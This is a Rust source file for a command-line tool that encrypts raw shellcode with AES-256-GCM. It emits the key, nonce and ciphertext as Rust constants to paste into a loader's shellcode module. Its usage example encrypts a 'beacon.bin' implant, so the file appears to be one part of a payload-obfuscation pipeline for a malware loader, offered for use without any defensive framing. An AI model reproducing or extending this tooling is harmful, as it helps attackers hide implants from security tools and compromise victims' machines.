//! encrypt_payload — standalone helper tool
//!
//! Usage:
//!   encrypt_payload <raw_shellcode.bin> <hex_key_64chars> <hex_nonce_24chars>
//!
//! Arguments:
//!   raw_shellcode.bin   — path to raw shellcode bytes
//!   hex_key_64chars     — 64 hex chars = 32 bytes AES-256 key  (e.g. deadbeef...88)
//!   hex_nonce_24chars   — 24 hex chars = 12 bytes GCM nonce    (e.g. aabbcc...5544)
//!
//! Encrypts with AES-256-GCM and prints Rust `const` declarations for
//! KEY, NONCE, and ENCRYPTED_SHELLCODE — paste directly into src/shellcode.rs,
//! or let prepare.sh do it automatically.
//!
//! Example (manual):
//!   cargo run -p encrypt_payload --release -- beacon.bin \
//!     $(openssl rand -hex 32) $(openssl rand -hex 12)

use aes_gcm::{
    aead::{Aead, KeyInit},
    Aes256Gcm, Key, Nonce,
};
use std::{env, fs, process};

fn decode_hex(s: &str, expected_bytes: usize, label: &str) -> Vec<u8> {
    if s.len() != expected_bytes * 2 {
        eprintln!(
            "[!] {} must be {} hex chars ({} bytes), got {}",
            label,
            expected_bytes * 2,
            expected_bytes,
            s.len()
        );
        process::exit(1);
    }
    (0..s.len())
        .step_by(2)
        .map(|i| {
            u8::from_str_radix(&s[i..i + 2], 16).unwrap_or_else(|_| {
                eprintln!("[!] Invalid hex character in {}: {}", label, &s[i..i + 2]);
                process::exit(1);
            })
        })
        .collect()
}

fn fmt_rust_array(label: &str, bytes: &[u8]) -> String {
    let mut out = format!("pub const {}: [u8; {}] = [\n", label, bytes.len());
    for (i, b) in bytes.iter().enumerate() {
        if i % 8 == 0 {
            out.push_str("    ");
        }
        out.push_str(&format!("0x{:02x}, ", b));
        if i % 8 == 7 {
            out.push('\n');
        }
    }
    if bytes.len() % 8 != 0 {
        out.push('\n');
    }
    out.push_str("];\n");
    out
}

fn main() {
    let args: Vec<String> = env::args().collect();
    if args.len() != 4 {
        eprintln!("Usage: encrypt_payload <shellcode.bin> <hex_key_64> <hex_nonce_24>");
        eprintln!("  hex_key_64  : 64 hex chars (32 bytes) — AES-256 key");
        eprintln!("  hex_nonce_24: 24 hex chars (12 bytes) — GCM nonce");
        process::exit(1);
    }

    let path      = &args[1];
    let hex_key   = &args[2];
    let hex_nonce = &args[3];

    let plaintext = fs::read(path).unwrap_or_else(|e| {
        eprintln!("[!] Failed to read '{}': {}", path, e);
        process::exit(1);
    });

    if plaintext.is_empty() {
        eprintln!("[!] Shellcode file '{}' is empty.", path);
        process::exit(1);
    }

    let key_bytes   = decode_hex(hex_key,   32, "KEY");
    let nonce_bytes = decode_hex(hex_nonce, 12, "NONCE");

    let cipher = Aes256Gcm::new(Key::<Aes256Gcm>::from_slice(&key_bytes));
    let nonce  = Nonce::from_slice(&nonce_bytes);

    let ciphertext = cipher.encrypt(nonce, plaintext.as_ref()).unwrap_or_else(|e| {
        eprintln!("[!] Encryption failed: {}", e);
        process::exit(1);
    });

    // Emit the three consts that replace src/shellcode.rs contents
    println!("// Auto-generated by encrypt_payload — do not edit by hand");
    println!("// Source       : {}", path);
    println!("// Plaintext    : {} bytes", plaintext.len());
    println!("// Ciphertext   : {} bytes (payload + 16-byte GCM tag)", ciphertext.len());
    println!();
    print!("{}", fmt_rust_array("KEY", &key_bytes));
    println!();
    print!("{}", fmt_rust_array("NONCE", &nonce_bytes));
    println!();
    print!("{}", fmt_rust_array("ENCRYPTED_SHELLCODE", &ciphertext));
}
